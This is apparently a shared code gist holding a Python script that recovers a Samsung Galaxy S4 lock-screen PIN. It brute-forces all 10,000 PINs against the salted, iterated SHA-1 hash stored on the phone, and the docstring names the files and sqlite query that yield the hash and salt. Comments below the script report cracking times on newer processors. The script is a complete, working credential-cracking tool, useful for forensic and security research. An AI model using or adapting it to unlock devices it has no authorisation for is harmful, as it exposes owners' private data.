Python implementation of passcode hashing algorithm used on the Samsung Galaxy S4 GT-I9505 4.2.2

samsung_hash_crack.py

#!/usr/bin/python

'''
Python implementation of passcode hashing algorithm used on the Samsung Galaxy S4 GT-I9505 4.2.2
Correct PIN for hash and salt below is 1234.

Get 40-character hash value in ascii hex format from file /data/system/password.key on the phone

Get salt in signed numeric format by doing sqlite3 query SELECT value FROM locksettings WHERE name = 'lockscreen.password_salt' on /data/system/locksettings.db

by @hubert3 2014-01-23
'''

import sys
from hashlib import sha1
from binascii import unhexlify

def get_salt(salt):
        int_salt = int(salt)   
        int_salt = (int_salt & 0xffffffffffffffff)
        salt = hex(int(int_salt)).lstrip("0x")
        salt = salt.rstrip('L')
        return salt

samsung_hash = unhexlify('867B4B7F6C7E5CCC50A1BD183D8C3E5801F20344'.lower())
salt = get_salt(-3343618892075477414)

for pin in map('{:04}'.format,range(0,10000)):
	print 'Hashing PIN %s' % pin
 	digest = sha1('0'+pin+salt).digest() # binary digest, not ascii hex
	for i in map(str,range(1,1024)): # Samsung uses 1024 SHA-1 iterations
		digest = sha1(digest+i+pin+salt).digest()
	if digest == samsung_hash:
		print 'FOUND PIN %s' % pin
		sys.exit(0)
print 'PIN not found'

Takes 20 seconds to try PINs 0000-9999 on 2.6 GHz i7

Python implementation based on info provided by Bjoern Kerler at donctl/sandy#2

Takes 7.5s on an i5 @ 3.2, nice job :)

1.74 seconds with [email protected] + Multiprocessing.

UPDATE:
On M1 pro :

• Not parallelized (python 3.10 & 3.11) == 0.66 sec
• Parallelized Python 3.10 & 3.11 == 0.13 sec

See you in 8 years with M7 Ultra 👋